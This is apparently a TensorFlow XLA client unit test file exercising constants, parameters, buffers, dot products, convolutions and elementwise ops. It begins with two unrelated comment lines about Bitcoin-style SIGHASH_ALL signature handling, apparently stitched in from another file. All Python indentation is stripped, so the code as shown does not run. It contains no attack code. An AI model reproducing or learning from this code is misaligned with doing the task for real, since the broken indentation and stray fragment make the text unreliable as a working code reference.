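    #     -> each signature gets '01' (SIGHASH_ALL) appended and is written back
    #        via tx.update_signatures()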
xla_client_test.py
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla import xla_data_pb2
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class EnumTest(unittest.TestCase):
"""Verifies Python enumerations match their protocol buffer equivalents."""
def testPrimitiveType(self):
for name, value in xla_client.PrimitiveType.__members__.items():
self.assertEqual(value, getattr(xla_data_pb2, name))
def testFormat(self):
for name, value in xla_client.Format.__members__.items():
self.assertEqual(value, getattr(xla_data_pb2, name))
class ComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
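    # (e.g. np.testing.assert_allclose(4., [[4.]]) passes thanks to broadcasting)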
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
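# Typical use of the helpers above (illustrative sketch only): build a
# computation, compile it, then execute it with Python values.
#   c = xla_client.ComputationBuilder("example")
#   c.Add(c.ConstantF32Scalar(1.0), c.ConstantF32Scalar(2.0))
#   compiled = c.Build().Compile()
#   result = compiled.ExecuteWithPythonValues()  # -> 3.0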
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(unittest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
root = c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
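    # -1 reinterpreted as uint32 is 0xFFFFFFFF; a logical right shift by 1 yields 0x7FFFFFFF.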
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(ComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added around the op
  being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486): re-enable when shape check is resolved
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
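    # Tuple form: ((lhs_contracting_dims, rhs_contracting_dims), (lhs_batch_dims, rhs_batch_dims)),
    # matching the DotDimensionNumbers proto used in the next test.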
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
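    # 0x7FFF needs 15 bits -> 17 leading zeros; 0x12345678 needs 29 bits -> 3 leading zeros.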
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
